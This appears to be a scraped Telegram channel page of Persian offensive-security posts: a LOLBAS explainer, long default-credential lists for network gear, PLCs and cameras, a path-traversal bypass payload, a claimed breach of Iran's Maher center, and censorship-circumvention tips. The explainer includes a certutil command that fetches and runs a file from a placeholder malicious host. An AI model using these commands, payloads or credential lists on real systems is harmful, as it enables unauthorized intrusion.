mandegar_sec | Unsorted

Telegram-канал mandegar_sec - Mandegar SEC🎩

-

offensive security☕️ گروه : @sec_gap 💣 python : t.me/persianpylearn admin : @Onthebytes💻 #bug_bounty #offsec

Subscribe to a channel

Mandegar SEC🎩

🖊 افزایش حقوق متخصصان امنیت سایبری و IT تصویب شد

- در راستای جذب و نگهداشت نیروهای متخصص فناوری اطلاعات و امنیت سایبری، سقف حقوق و مزایای نخبگان و کارکنان این حوزه افزایش یافت.
- سازمان اداری و استخدامی کشور موظف است فرآیند قانونی افزایش حقوق و فوق‌العاده ویژه برای کارکنان حوزه فناوری اطلاعات و امنیت سایبری را بر اساس تجربه، تخصص و اهمیت وظایف آنها انجام دهد.
- این تصمیم با هدف حفاظت از زیرساخت‌های حیاتی فناوری اطلاعات، امنیت ملی و بهبود بهره‌وری در حوزه‌های دیجیتال و هوشمندسازی اتخاذ شده است.

- همچنین میزان و نحوه اعطای فوق‌العاده بر اساس سطح تخصص، مهارت، کیفیت خدمات و میزان ماند کاری افراد تعیین خواهد شد و دستورالعمل آن طی ۳ تا ۴ ماه آینده توسط سازمان اداری و استخدامی کشور با همکاری وزارت ارتباطات و سازمان برنامه و بودجه تهیه و به تصویب هیئت وزیران خواهد رسید.

دیجیاتو

Channel
💬 Group

Читать полностью…

Mandegar SEC🎩

LOLBAS - توضیح کامل و ساده

چیست؟

LOLBAS مخفف "Living Off The Land Binaries And Scripts" هست. یعنی "فایل‌های اجرایی و اسکریپت‌های بومی سیستم".

تشبیه ساده:

تصور کنید یک دزد وارد خانه شما شود، اما به جای آوردن ابزار خودش، از وسایل داخل خانه شما برای دزدی استفاده کند!

تعریف دقیق:

LOLBAS به فایل‌های قانونی و پیش‌فرض سیستم عامل (مثل cmd.exe، PowerShell، certutil.exe) اشاره دارد که هکرها می‌توانند از آنها برای فعالیت‌های مخرب بدون نصب نرم‌افزار جدید استفاده کنند.

چرا خطرناک است؟

1. شناخته شده نیستند: این ابزارها جزء سیستم عامل هستند، بنابراین آنتی‌ویروس آنها را بلوکه نمی‌کند
2. مجاز هستند: توسط مدیر سیستم (Admin) اجرا می‌شوند
3. قدرتمند هستند: دسترسی کامل به سیستم دارند

مثال‌های معروف:

ابزار سیستم استفاده قانونی استفاده مخرب
certutil.exe مدیریت گواهی‌ها دانلود فایل مخرب از اینترنت
bitsadmin.exe مدیریت دانلود ویندوز دانلود بدافزار
wmic.exe مدیریت سیستم اجرای دستورات از راه دور
msbuild.exe کامپایل کد اجرای کد مخرب
regsvr32.exe ثبت کتابخانه‌ها اجرای اسکریپت از URL

مثال عملی حمله:

# هکر از certutil برای دانلود بدافزار استفاده می‌کند
certutil -urlcache -split -f http://malicious-site.com/virus.exe C:\Windows\Temp\temp.exe

# سپس آن را اجرا می‌کند
C:\Windows\Temp\temp.exe
چگونه کار می‌کند؟

1. هکر به سیستم دسترسی اولیه پیدا می‌کند
2. به جای آوردن ابزار خودش، از ابزارهای موجود سیستم استفاده می‌کند
3. فعالیت مخرب را انجام می‌دهد
4. ردپای کمی به جا می‌گذارد (چون نرم‌افزار جدیدی نصب نکرده)

انواع LOLBAS:

1. LOLBins (Binary)

فایل‌های اجرایی سیستم مثل:

· PowerShell
· Command Prompt
· Windows Management Instrumentation (WMI)

2. LOLScripts

اسکریپت‌های سیستم مثل:

· VBScript
· JavaScript
· Batch Files

3. LOLDrivers

درایورهای قانونی سیستم

وبسایت رسمی:

پروژه LOLBAS در آدرس https://lolbas-project.github.io تمام این ابزارها را مستند کرده است.

روش‌های دفاع:

1. نظارت (Monitoring)

· لاگ‌گیری از اجرای ابزارهای سیستمی
· مانیتورینگ فعالیت‌های غیرعادی

2. محدودسازی (Restriction)

· اجرای Application Whitelisting
· محدود کردن دسترسی کاربران

3. آموزش (Training)

· آموزش تیم امنیت
· آگاهی از تکنیک‌های جدید

4. ابزارهای امنیتی

· استفاده از EDR (Endpoint Detection and Response)
· سیستم‌های نظارت پیشرفته

مزایا برای هکرها:

✅ کمتر شناسایی می‌شوند
✅ نیاز به نصب ابزار ندارند
✅ دسترسی کامل به سیستم دارند
✅ به راحتی قابل پنهان‌سازی هستند

جمع‌بندی:

LOLBAS مانند استفاده از کلید اصلی خانه علیه صاحب خانه است. هکرها از اعتماد سیستم به ابزارهایه
داخلی خودش سوءاستفاده میکنند.

-author : @LeakegeoOo

برای دریافت به‌روزرسانی‌های امنیتی روزانه، و اخبار امنیت سایبری مارو به عنوان منبع مورد نظر خود دنبال کنید ->❤️💻
GROUP ™️
@mandegar_sec | channel

Читать полностью…

Mandegar SEC🎩

A step-by-step guide to writing an iOS kernel exploit😼

https://alfiecg.uk/2024/09/24/Kernel-exploit.html


برای دریافت به‌روزرسانی‌های امنیتی روزانه، و اخبار امنیت سایبری مارو به عنوان منبع مورد نظر خود دنبال کنید ->❤️💻
GROUP ™️
@mandegar_sec | channel


Читать полностью…

Mandegar SEC🎩

Privilege escalation using Linux capabilities🍸




@mandegar_sec | channel
Group™️

Читать полностью…

Mandegar SEC🎩

Password reset checklist



@mandegar_sec | channel
Group🕊

Читать полностью…

Mandegar SEC🎩

نام کتاب : The Hacker Mindset

ترجمه شده توسط : Typhon✍️

تاریخ انتشار : 2026/1/31

+ نسخه فارسی
|

#رایگان_برای_اعضای_چنل
channel : @persian_b_sec

Читать полностью…

Mandegar SEC🎩

عزیزان برای اینکه چنل بهم نریزه
کانفیگ ها و روش ها در این تاپیک قرار میگیره❤️

/channel/sec_gap/27493

#freeWorld

Читать полностью…

Mandegar SEC🎩

Cache Deception + CSPT: 👾
Turning Non Impactful Findings into Account Takeover

توجه شمارو جلب میکنم به این مقاله که نشون میده دو باگ (Cache Deception و CSPT) ، اگه هوشمندانه با هم ترکیب بشن چجوری میتونن به Account Takeover واقعی ختم بشن.

https://zere.es/posts/cache-deception-cspt-account-takeover/



برای دریافت به‌روزرسانی‌های امنیتی روزانه، و اخبار امنیت سایبری مارو به عنوان منبع مورد نظر خود دنبال کنید ->❤️💻
@mandegar_sec | channel
Group ™️

Читать полностью…

Mandegar SEC🎩

https://github.com/4n0nymou3/cloudflare-doh-proxy
این dns over https هم جالبه
باهاش میشه ‌twitter , youtube بدون فیلتر باز کرد
مطمن نیستم ولی طولانی مدت ممکنه ایپی ایران بخوره داخل توییتر

Читать полностью…

Mandegar SEC🎩

جلسه اول کارگاه فارنزیک

Читать полностью…

Mandegar SEC🎩

#DefaultCredentials

1. Cisco

User: cisco
Password: cisco

2. Citrix
User: nsroot
Password: nsroot

3. Dell iDRAC
User: root
Password: calvin

4. Juniper
User: super
Password: juniper123

5. pfSense
User: admin
Password: pfsense

6. SAP
User: SAP*
Password: 06071992

7. Tomcat
User: tomcat
Password: tomcat

8. UniFi
User: ubnt
Password: ubnt

9. Weblogic
User: weblogic
Password: weblogic1

10. Zabbix
User: Admin
Password: zabbix

11. Windows
User: Administrator
Password: P@ssw0rd



برای دریافت به‌روزرسانی‌های امنیتی روزانه، و اخبار امنیت سایبری مارو به عنوان منبع مورد نظر خود دنبال کنید ->❤️💻
GROUP ™️
@mandegar_sec | channel

Читать полностью…

Mandegar SEC🎩

مرکز ماهر هک شد😐😂🤦‍♂

Читать полностью…

Mandegar SEC🎩

746 استاد دانشگاه به سران قوا نامه زدن و درخواست کردن پلتفرم‌هایی مثل اینستاگرام برای همیشه مسدود بشن و هر چه سریع‌تر مسیر پیشرفت نرم‌افزار‌های داخلی مهیا بشه.

Читать полностью…

Mandegar SEC🎩

http://test67.liara.run

اینرو یکی از دوستان فرستاد
اگ وصل بگید❤️🕊

Читать полностью…

Mandegar SEC🎩

وقتی در گودال هستی، دیگر لازم نیست نگران سقوط باشی.

مالون می‌میرد
ساموئل بکت

Читать полностью…

Mandegar SEC🎩

یه حمایت ریز کنید به 3k برسیم☺️😘

Читать полностью…

Mandegar SEC🎩

من یسری کانال که به امنیت ربط داره رو داشتم و اینجا میذارم اگه شما هم دارید زیر این پست کامنت کنید

@mandegar_sec
@dagen_security
@GitBook_s
@GOTOCVE
@hackhaven_new
@Hackhive_channel
@bugbountyhints
@world_of_security
@RadvanSec
@KirTooKarmandi
@pentesterland1
@projectzeroTM
@sec_hint

@thebugbountyhunter
@lu3ky_13

Читать полностью…

Mandegar SEC🎩

Bug Bounty Recon Mindmap🗺



برای دریافت به‌روزرسانی‌های امنیتی روزانه، و اخبار امنیت سایبری مارو به عنوان منبع مورد نظر خود دنبال کنید ->❤️💻

@mandegar_sec | channel
Group™️

Читать полностью…

Mandegar SEC🎩

🍏 سرور جدید 🇩🇪 Npv Tunnel   
مناسب: همراه اول و ایرانسل
📶حجم 500 گیگ

متصل پینگ 220

اینترنت آزاد برای همه یا هیچ کس!
@OniyxVpn

Читать полностью…

Mandegar SEC🎩

If you are tryint to exploit a CSPT and the sequence ".." is blocked, you can try the following: ".%0a./.%0a./"

"\t", "\n" and "\r" will all be removed from the input before starting to parse


@mandegar_sec | channel
Group™️

Читать полностью…

Mandegar SEC🎩

🚨 Malicious EPUBs.

یه کمپین جدید داره از CVE-2023-44451
توی Xreader لینوکس مینت سوء استفاده میکنه.

سناریوش اینجوریه که مهاجم با Directory Traversal میره سراغ فایل‌ های حساس، بعدش هم با پیلود پایتونی Fileless کارشو ادامه میده؛ بدون اینکه فایل مشخصی روی دیسک بذاره.
همین باعث میشه شناسایی و دیـتکت شدنش برای انتی‌ ویروس‌ ها و ابزارهای امنیتی خیلی سخت‌تر بشه.
خلاصه اگه لینوکس مینت دارید یا با Xreader کار می‌کنید، این یکی رو دست‌ کم نگیرید.

📄: https://bit.ly/49O6Ym3

برای دریافت به‌روزرسانی‌های امنیتی روزانه، و اخبار امنیت سایبری مارو به عنوان منبع مورد نظر خود دنبال کنید ->❤️💻
@mandegar_sec | channel
Group™️

Читать полностью…

Mandegar SEC🎩

https://www.linkedin.com/posts/reza-sharifzade-649a8b18a_the-first-course-in-2026-course-start-09-activity-7422967784654966785-h3sO?utm_medium=ios_app&rcm=ACoAACynbdkBjwS7XkCf7Nkb04x0i6a-3_jtLFM&utm_source=social_share_send&utm_campaign=copy_link

Читать полностью…

Mandegar SEC🎩

سعید سوزنگر، مصطفی موسوی و ایمان صیرفی از بچه‌های فعال آیتی دستگیر شدن. حداقل‌ترین کاری که می‌تونیم بکنیم اینه که صداشون باشیم و اطلاع‌رسانی کنیم.

این پست رو توی گروه‌های مرتبط با Tech فوروارد کنید، اگه کانال دارید اسم و عکسشونو بذارید. یادتون باشه که هر کدوم از ما می‌تونستیم جای اونا باشیم. ✌🏻❤️

Читать полностью…

Mandegar SEC🎩

تسلیت به خانواده‌ های داغ‌ دار

این روزهای تلخ
درد شما، درد ماست. در غمتان شریکیم.

Читать полностью…

Mandegar SEC🎩

#DefaultCredentials - Part 2 🔐

1. VMware vCenter

User: administrator@vsphere.local
Password: Admin!23

1. Fortinet FortiGate

User: admin
Password: [blank]

1. F5 BIG-IP

User: admin
Password: admin

1. Palo Alto Networks

User: admin
Password: admin

1. Check Point

User: admin
Password: admin

1. Jenkins

User: admin
Password: password

1. GitLab

User: root
Password: 5iveL!fe

1. Grafana

User: admin
Password: admin

1. Kibana

User: elastic
Password: changeme

1. MongoDB

User: admin
Password: admin

1. PostgreSQL

User: postgres
Password: postgres

1. Oracle Database

User: SYSTEM
Password: manager

1. Redis

No authentication

1. Apache Tomcat

User: tomcat
Password: tomcat

1. JBoss

User: admin
Password: admin

1. HP iLO

User: Administrator
Password: [on device label]

1. Dell iDRAC

User: root
Password: calvin

1. Supermicro IPMI

User: ADMIN
Password: ADMIN

1. Cisco IOS

User: cisco
Password: cisco

1. Juniper

User: root
Password: [blank]

1. MikroTik

User: admin
Password: [blank]

1. Ubiquiti

User: ubnt
Password: ubnt

1. Hikvision Camera

User: admin
Password: 12345

1. Dahua Camera

User: admin
Password: admin

1. Synology NAS

User: admin
Password: [blank]

1. QNAP NAS

User: admin
Password: admin

1. Raspberry Pi

User: pi
Password: raspberry

1. Siemens S7 PLC

No authentication

1. Schneider Electric

User: USER
Password: USER

1. TP-Link Router

User: admin
Password: admin

1. Netgear

User: admin
Password: password

1. HP Printer

User: admin
Password: [blank]

1. Xerox Printer

User: admin
Password: 1111

1. Brother Printer

User: admin
Password: access

1. RabbitMQ

User: guest
Password: guest

1. Kubernetes Dashboard

No auth by default

1. Docker Registry

No auth by default

1. Artifactory

User: admin
Password: password

1. Nexus

User: admin
Password: admin123

1. SonarQube

User: admin
Password: admin

1. Atlassian Jira

User: admin
Password: admin

1. Confluence

User: admin
Password: admin

1. pfSense

User: admin
Password: pfsense

1. OPNsense

User: root
Password: opnsense

1. Sophos UTM

User: admin
Password: admin

1. WatchGuard

User: admin
Password: readwrite

1. Fortigate SSL VPN

User: admin
Password: [blank]

1. Pulse Secure

User: admin
Password: admin123

1. Aruba

User: admin
Password: admin

1. Ruckus Wireless

User: super
Password: sp-admin



برای دریافت به‌روزرسانی‌های امنیتی روزانه، و اخبار امنیت سایبری مارو به عنوان منبع مورد نظر خود دنبال کنید ->❤️💻
GROUP ™️
@mandegar_sec | channel

#InfoSec #PenTesting #BugBounty #DefaultCredentials #SecurityResearch

Читать полностью…

Mandegar SEC🎩

کلیه ویدیوها و فایل‌های ارسالی توسط هانترهای ایرانی به مرکز ماهر، شامل تصاویر، ویدیوها، فایل‌های PDF و مستندات متنی که به‌عنوان PoC ارسال شده بودند، توسط ما به‌صورت کامل استخراج و دامپ شده‌اند.

نکته قابل توجه آن است که هیچ‌یک از گزارش‌های ارسال‌شده توسط این هانترها مورد پیگیری مؤثر قرار نگرفته است. برای مثال، در سال ۲۰۲۳ یکی از افراد وابسته به یکی از سازمان‌های ایرانی یک آسیب‌پذیری از نوع RCE را گزارش کرده که این باگ همچنان در سامانه مربوطه بدون اصلاح باقی مانده است!!

Читать полностью…

Mandegar SEC🎩

خودتون رو برای سخت‌تر شدن دسترسی‌ها و خاموشی بعدی آماده کنین!

بیشتر از ۲ هفته از قطع سراسری اینترنت بین‌الملل در ایران میگذره، ولی حالا که بصورت موقت دسترسی‌ها درحال برقرار شدنه، خودتون رو برای خاموشی قریب‌الوقوع بعدی آماده کنین:

- نصب ابزارهای ارتباطی P2P (مثل نقطه‌ها، زنجیر، Bridgefy و Bitchat)
- نصب اپ توشه یا رستم‌مدیا (برای دریافت اخبار از طریق ماهواره)
- تهیه استارلینک (تهیه پرریسک و نیازمند داشتن توان مالی)
- تهیه سیمکارت از کشورهای همسایه (اگر نزدیک به مرز هستید)
- بروز نگه‌داشتن اپ‌های VPN (حتی اگر درست کار نمی‌کردن)
و ...

👉 t.me/ircf_toolbox/16

🔍 ircf.space
@ircfspace

Читать полностью…

Mandegar SEC🎩

خب کم کم آیپی های کلودفلر باز شد

Ipin1.Oldinomi.com
104.18.32.47
chatgpt.com
chat.openai.com
open.chatgpt.com
104.18.32.47
216.239.38.120
3.160.196.89
162.159.152.4

اینارو تست کنین بجای ip های chatgpt.com


GROUP ™️
@mandegar_sec | channel

Читать полностью…

Mandegar SEC🎩

#Dns

185.98.113.113
185.98.114.114
....
172.20.11.11
172.20.11.12
...
8.26.56.26
5.200.200.200
...




@mandegar_sec | channel
Group™️

Читать полностью…

Mandegar SEC🎩

کلاینت و سرورش رو میتونید از این ادرس دانلود کنید

https://5688.s3.ir-thr-at1.arvanstorage.ir/dnstt-client-linux-amd64?versionId=

https://5688.s3.ir-thr-at1.arvanstorage.ir/dnstt-server-linux-amd64?versionId=

Читать полностью…
Subscribe to a channel